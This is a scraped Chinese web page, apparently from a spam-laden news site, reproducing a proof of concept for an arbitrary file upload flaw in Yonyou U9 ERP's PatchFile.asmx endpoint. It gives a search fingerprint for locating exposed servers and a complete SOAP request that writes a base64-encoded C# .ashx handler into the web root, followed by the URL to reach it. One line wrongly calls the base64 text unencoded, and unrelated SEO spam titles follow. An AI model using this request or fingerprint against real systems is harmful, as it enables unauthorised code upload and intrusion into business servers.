当前位置: 首页 > news >正文

网站做外链的好处搜全网的浏览器

网站做外链的好处,搜全网的浏览器,广而告之微信推广平台,做网站的开发语言声明: 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 简介 用友U9是由中国用友软件股份有限公司开发的一款企业…

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

用友U9是由中国用友软件股份有限公司开发的一款企业级管理软件。它是用友软件公司旗下的一款ERP(企业资源计划)软件,旨在帮助企业实现信息化管理和提升运营效率。提供了广泛的功能模块,包括财务管理、采购管理、销售管理、生产管理、仓储管理、人力资源管理、供应链管理等。它支持多行业、多业务模式的企业使用,并可以根据企业的需求进行个性化定制。

用友U9 存在PatchFile.asmx接口任意文件上传漏洞

资产搜索

body="logo-u9.png"

漏洞复现

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/SaveFile"
Content-Length: 895<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SaveFile xmlns="http://tempuri.org/"><binData>PCUgQCB3ZWJoYW5kbGVyIGxhbmd1YWdlPSJDIyIgY2xhc3M9IkF2ZXJhZ2VIYW5kbGVyIiAlPiAKdXNpbmcgU3lzdGVtOyAKdXNpbmcgU3lzdGVtLldlYjsgCgpwdWJsaWMgY2xhc3MgQXZlcmFnZUhhbmRsZXIgOiBJSHR0cEhhbmRsZXIgCnsgCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlIAogICAgeyAKICAgICAgICBnZXQgewogICAgICAgICAgICAgcmV0dXJuIHRydWU7IAogICAgICAgICAgICB9IAogICAgICAgIH0gCiAgICAgICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY3R4KSAKICAgICAgICB7IAogICAgICAgICAgICBjdHguUmVzcG9uc2UuV3JpdGUoImhlbGxvLEkgYW0gY3MiKTsgCiAgICAgICAgfSAKICAgIH0=</binData><path>./</path><fileName>cs.ashx</fileName></SaveFile></soap:Body></soap:Envelope>

这部分代码未base64 编码

PCUgQCB3ZWJoYW5kbGVyIGxhbmd1YWdlPSJDIyIgY2xhc3M9IkF2ZXJhZ2VIYW5kbGVyIiAlPiAKdXNpbmcgU3lzdGVtOyAKdXNpbmcgU3lzdGVtLldlYjsgCgpwdWJsaWMgY2xhc3MgQXZlcmFnZUhhbmRsZXIgOiBJSHR0cEhhbmRsZXIgCnsgCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlIAogICAgeyAKICAgICAgICBnZXQgewogICAgICAgICAgICAgcmV0dXJuIHRydWU7IAogICAgICAgICAgICB9IAogICAgICAgIH0gCiAgICAgICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY3R4KSAKICAgICAgICB7IAogICAgICAgICAgICBjdHguUmVzcG9uc2UuV3JpdGUoImhlbGxvLEkgYW0gY3MiKTsgCiAgICAgICAgfSAKICAgIH0=

上传成功后访问:
http://127.0.0.1/CS/Office/AutoUpdates/cs.ashx

http://www.15wanjia.com/news/10223.html

相关文章:

  • 萝卜建站分类信息中国国家人事人才培训网证书查询
  • 做网站前产品经理要了解什么seo优化网站的注意事项
  • 响应式营销网站百度点击排名收费软件
  • 临沂网站建设排名西点培训前十名学校
  • 徐州市住房建设局网站首页自己建网站怎么推广
  • WordPress设置作者信息企业网站排名优化公司
  • wordpress调用具体文章成都百度seo推广
  • 沈阳高端网站制作公司seo技术分享免费咨询
  • 湖南省疫情防控指挥部最新公告深圳网站关键词排名优化
  • 免费涨粉工具竞价推广和seo的区别
  • 做网站ui商品推广软文范例200字
  • 制作头像的软件优化大师windows
  • web网站开发语言排名最近韩国电影片
  • 上海网站建设找缘魁查询网入口
  • 怎样做自己网站robotsseo推广排名平台有哪些
  • 乱起封神是那个网站开发的全网关键词优化公司哪家好
  • seo网站建设是什么意思知名网络推广
  • 优化网站公司价格是多少钱广州网络营销运营
  • b2b的网站有哪些(10个)广告联盟平台排名
  • wordpress必下载工具搜索引擎seo外包
  • 网站建站建设怎么做舆情危机公关公司
  • wordpress高级培训武汉谷歌seo
  • 做网站费用多少钱最新引流推广方法
  • 外包手工活在哪里拿货百度关键词优化公司哪家好
  • 长沙电商网站建设北京厦门网站优化
  • 有什么推荐的网站seo营销是什么
  • 网站备案信息抽查磁力搜索器
  • 做网站的公司不给域名网络市场调研的五个步骤
  • 慕课网站开发有域名后如何建网站
  • 北京电子商务网站建设二十条优化措施